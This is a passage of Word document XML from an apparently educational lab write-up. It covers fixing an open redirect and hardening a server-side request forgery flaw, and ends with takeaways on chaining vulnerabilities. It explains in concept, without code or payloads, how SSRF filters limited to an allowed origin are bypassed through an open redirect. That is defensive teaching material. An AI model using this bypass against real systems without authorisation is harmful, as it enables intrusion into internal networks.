    </w:p>
    <w:p w14:paraId="65BAB324" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00ED0889">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="467769CF" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>8.1 Fix the Open Redirect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E22FC18" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>The most direct fix is to eliminate the open redirect that enables the chain:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2E1303" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Validate the path parameter against a whitelist of allowed relative paths.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359C4251" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Reject any absolute URLs (those starting with http:// or //) in the path parameter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A8EA4D" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use an internal mapping (e.g. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>productId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> → URL) rather than echoing user input into Location.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593173BF" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00ED0889">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5932562E" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>8.2 Fix the SSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B20FCD9" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Even if the open redirect is fixed, the SSRF vector should also be hardened:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B90FE61" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>After redirect resolution, validate the final destination IP against a blocklist of private/internal ranges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447B984B" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Disable automatic redirect-following in the HTTP client used by the stock checker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548E52E8" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Enforce network-level egress controls to block outbound requests to RFC-1918 addresses (10.x, 172.16-31.x, 192.168.x).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730F6A11" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Consider using a dedicated outbound proxy that enforces allowlists at the network layer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3164FB93" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00ED0889">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A13F160" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00ED0889">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="BDC3C7"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A1FA17A" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00ED0889">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A82A899" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A5276"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>9. Key Takeaways</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318AE946" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00ED0889">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3923E74A" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Origin-based SSRF filters can be bypassed by chaining through an open redirect on the allowed origin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316CD8F3" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Open redirects are often treated as low-severity — this lab shows they can be critical when chained.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CBBEAA" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>HTTP clients that follow redirects automatically are a common SSRF amplifier.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5E582D" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Defense must cover the final resolved destination, not just the initial request URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246976B7" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vulnerability chaining is a core </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pentesting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> mindset: a 'medium' + a 'medium' can equal a 'critical'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFBFF14" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00ED0889">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A758FBC" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00ED0889">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="BDC3C7"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B1807AC" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00ED0889">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23EB2C4D" w14:textId="5AF07079" w:rsidR="00ED0889" w:rsidRDefault="00ED0889">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00ED08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E4D7F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7FECEA06"/>
    <w:lvl w:ilvl="0" w:tplc="64F44510">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="079A16BA">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="32E00238">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="A01283A8">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="609CC9A0">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="B1628088">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="584A8B30">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="4C9A0494">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="00028DF6">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4EE16601"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0436D5A0"/>
    <w:lvl w:ilvl="0" w:tplc="080ADF3E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="038EA8F4">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="4A309E3A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="BDFCFBB2">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="70AE55FC">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="33BC3DF6">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="8DDC95B6">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="D8281EDC">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="3B1E46FE">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7532638B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="88AA7E02"/>
    <w:lvl w:ilvl="0" w:tplc="83EEC5C6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="BBD2E34C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="58F8775C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="81F89DE0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="23C6C2FC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="F88251D2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="4C90BE14">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="9970CBA6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="408CA782">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="1438481157">
    <w:abstractNumId w:val="2"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1950772425">
    <w:abstractNumId w:val="0"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="8901156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889"/>
    <w:rsid w:val="00E46641"/>
    <w:rsid w:val="00ED0889"/>
    <w:rsid w:val="00F1182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0242"/>
  <w15:docId w15:val="{F64B7881-91D3-4913-A475-8FA054627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6"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="280" w:after="1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1015</Words>
  <Characters>5787</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>48</Lines>
  <Paragraphs>13</Paragraphs>
  <ScaleCrop>false</ScaleCrop>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Neelesh Pandey</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-17T07:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-17T10:40:00Z</dcterms:modified>
</cp:coreProperties>
</file>